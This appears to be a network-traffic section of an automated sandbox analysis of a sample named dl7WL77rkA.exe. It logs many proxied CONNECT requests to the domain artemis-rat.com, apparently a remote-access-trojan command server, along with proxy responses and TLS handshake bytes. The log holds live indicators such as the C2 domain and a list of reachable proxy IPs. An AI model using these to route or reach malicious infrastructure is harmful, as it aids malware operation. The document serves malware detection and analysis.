                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.001975060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.427506924 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            352192.168.2.551016172.67.206.105803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.006752014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.163444042 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            353192.168.2.55088952.196.1.182803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.014061928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.277811050 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.279231071 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ee 6c ce 07 ea 50 af 38 7e ee 91 0a a5 4c 33 75 ad 29 c8 02 53 79 40 86 ac 7e ca 17 23 20 37 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                                                                                                                                                                                            Data Ascii: elP8~L3u)Sy@~# 7*,+0/$#('=<5/Uartemis-rat.com#
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.546186924 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 7a 67 27 be 40 41 7c 94 c5 3c 34 db 76 94 9d 34 59 1a 02 cb 3f eb c6 04 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                                                                                                                                                                                                                                            Data Ascii: =9zg'@A|<4v4Y?DOWNGRD0000*H010Uartemis-rat.com0240311021335Z260311021335Z010Uartemis-rat.com0"0*H0K
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.570149899 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 3e 40 23 64 21 2e 3c 9d 41 33 a8 9d cf 93 0e 30 2f 64 22 bf 0b a6 7d 0f ba 15 75 d7 00 63 2c 0b 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 51 7d c4 28 3a 6c 64 cf cf d7 f2 f5 6b 94 51 85 2e 8c ae 62 97
                                                                                                                                                                                                                                                            Data Ascii: %! >@#d!.<A30/d"}uc,(Q}(:ldkQ.bh<_Q4
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.850482941 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 73 92 44 9b a3 1c a1 b2 f0 7a 97 5d 6a ce 0e ae f8 53 61 05 8e 55 fc 36 1a 63 74 e4 55 6f 60 4f 44 9f 5e 3a de 46 8c 4b
                                                                                                                                                                                                                                                            Data Ascii: (sDz]jSaU6ctUo`OD^:FK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            354192.168.2.55084045.11.95.16550033876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.014919043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.506150961 CET39INHTTP/1.0 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            355192.168.2.55089968.1.210.16341453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.016108036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            356192.168.2.550898184.181.217.22041453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.016109943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            357192.168.2.550875103.197.71.7803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.021948099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            358192.168.2.5508738.213.128.904443876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.029680967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.366126060 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            359192.168.2.550856201.149.127.2280803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.037446022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.779808998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.858026028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.108262062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            360192.168.2.550124175.100.91.15180803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.046051979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.108056068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            361192.168.2.55069151.68.164.77168923876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.049294949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.076718092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            362192.168.2.55089513.38.176.10431283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.053488016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.350292921 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            363192.168.2.550851212.23.217.3580803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.056961060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.811074972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.697926998 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            364192.168.2.5508908.218.100.12080803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.058825016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.362978935 CET309INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 157
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.24.0</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            365192.168.2.550907212.110.188.222344113876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.058828115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.483002901 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            366192.168.2.55089343.133.71.20156733876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.087192059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            367192.168.2.550611199.58.185.941453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.087234974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            368192.168.2.55091543.129.228.4678903876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.087356091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.399050951 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            369192.168.2.551091104.16.104.12803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.087615013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.242146015 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            370192.168.2.551092185.162.228.128803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.087620020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.241807938 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            371192.168.2.550925154.85.58.149803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.087707996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.419852018 CET321INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: openresty/1.15.8.2
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 163
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty/1.15.8.2</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            372192.168.2.551122172.67.182.126803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.087717056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.242111921 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
